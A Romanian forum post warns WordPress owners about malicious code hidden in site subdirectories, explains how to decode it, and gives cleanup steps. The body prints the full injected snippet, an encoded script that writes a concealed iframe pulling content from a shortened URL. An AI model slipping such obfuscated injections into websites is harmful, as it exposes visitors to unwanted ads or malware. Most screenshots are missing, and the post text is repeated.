Tocmai mi-a fost raportat un virus care apare pe mai multe site-uri. Am scris in titlul [HASHTAG]#wordpress[/HASHTAG] pentru ca este cea mai folosita platforma si cel mai des utilizata pentru a trimite [HASHTAG]#virusi[/HASHTAG].
Codul in cauza arata cam asa:
Acest code este ascuns adanc in site, adica nu va fi in root ci in subdirectoare. Gen site.com/site/khfkdfd/khfkd/khfksdf/code.html
Codul de mai sus este folosit pentru a afisa publicitate sau virusi pe alte site-uri sau chiar site-ul tau.
Cand gasiti astfel de coduri, cel mai bine este sa le stergeti imediat.
La accesare in browser acest code arata cam asa:
Forma la banner si reclama poate diferi de la un user la altul.
Codul sursa arata cam asa:
Codul din imaginea de mai sus este doar o parte.
Cum poti vedea ce e ascunde in code.
Inlocuiesti document.write cu document.alert.
Acum accesezi in browser fisierul si dupa incarcare tastezi comanda CTRL +U, pentru a vedea sursa, care va arata cam asa:
cand accesam primul link din sursa ne arata codul de mai jos:
Acest code il decodam cu ajutorul acestui site:
http://jsbeautifier.org/
Care ne va da acest rezultat:
Recomandarea mea este:
1. intrati in ftp si verificati fiecare folder si fiecare fisier din acestea care pare suspect. Cel mai bine este sa aveti si fisierele de la wordpress pentru a face o comparatie.
2. Orice gasiti suspicios stergeti imediat.
3. din wp-admin executati update la wordpress, sau re-install. Nu se intampla nimic daca executati udate sau re-install.
4. schimbati parolele la ftp si wp-admin.
Pentru alte intrebari postati mai jos.
Codul in cauza arata cam asa:
Cod:
<div>
<div style="overflow: hidden; width: 300px; height: 250px; position: relative;" id="i_div"><script type='text/javascript'> str='@3C@69@66@72@61@6D@65@20@6E@61@6D@65@3D@22@69@5F@66@72@61@6D@65@22@20@73@72@63@3D@22@68@74@74@70@3A@2F@2F@67@6F@6F@2E@67@6C@2F@6E@61@4C@43@4A@30@22@20@73@74@79@6C@65@3D@22@62@6F@72@64@65@72@3A@20@30@70@74@20@6E@6F@6E@65@20@3B@20@6C@65@66@74@3A@20@2D@31@33@30@70@78@3B@20@74@6F@70@3A@20@2D@32@34@30@70@78@3B@20@70@6F@73@69@74@69@6F@6E@3A@20@61@62@73@6F@6C@75@74@65@3B@20@77@69@64@74@68@3A@20@31@31@36@30@70@78@3B@20@68@65@69@67@68@74@3A@20@31@34@34@30@70@78@3B@22@20@73@63@72@6F@6C@6C@69@6E@67@3D@22@6E@6F@22@3E@3C@2F@69@66@72@61@6D@65@3E'; document.write(unescape(str.replace(/@/g,'%'))); </script></div>
</div>
</div>Acest code este ascuns adanc in site, adica nu va fi in root ci in subdirectoare. Gen site.com/site/khfkdfd/khfkd/khfksdf/code.html
Codul de mai sus este folosit pentru a afisa publicitate sau virusi pe alte site-uri sau chiar site-ul tau.
Cand gasiti astfel de coduri, cel mai bine este sa le stergeti imediat.
La accesare in browser acest code arata cam asa:
Forma la banner si reclama poate diferi de la un user la altul.
Codul sursa arata cam asa:
Codul din imaginea de mai sus este doar o parte.
Cum poti vedea ce e ascunde in code.
Inlocuiesti document.write cu document.alert.
Acum accesezi in browser fisierul si dupa incarcare tastezi comanda CTRL +U, pentru a vedea sursa, care va arata cam asa:
cand accesam primul link din sursa ne arata codul de mai jos:
Acest code il decodam cu ajutorul acestui site:
http://jsbeautifier.org/
Care ne va da acest rezultat:
Recomandarea mea este:
1. intrati in ftp si verificati fiecare folder si fiecare fisier din acestea care pare suspect. Cel mai bine este sa aveti si fisierele de la wordpress pentru a face o comparatie.
2. Orice gasiti suspicios stergeti imediat.
3. din wp-admin executati update la wordpress, sau re-install. Nu se intampla nimic daca executati udate sau re-install.
4. schimbati parolele la ftp si wp-admin.
Pentru alte intrebari postati mai jos.
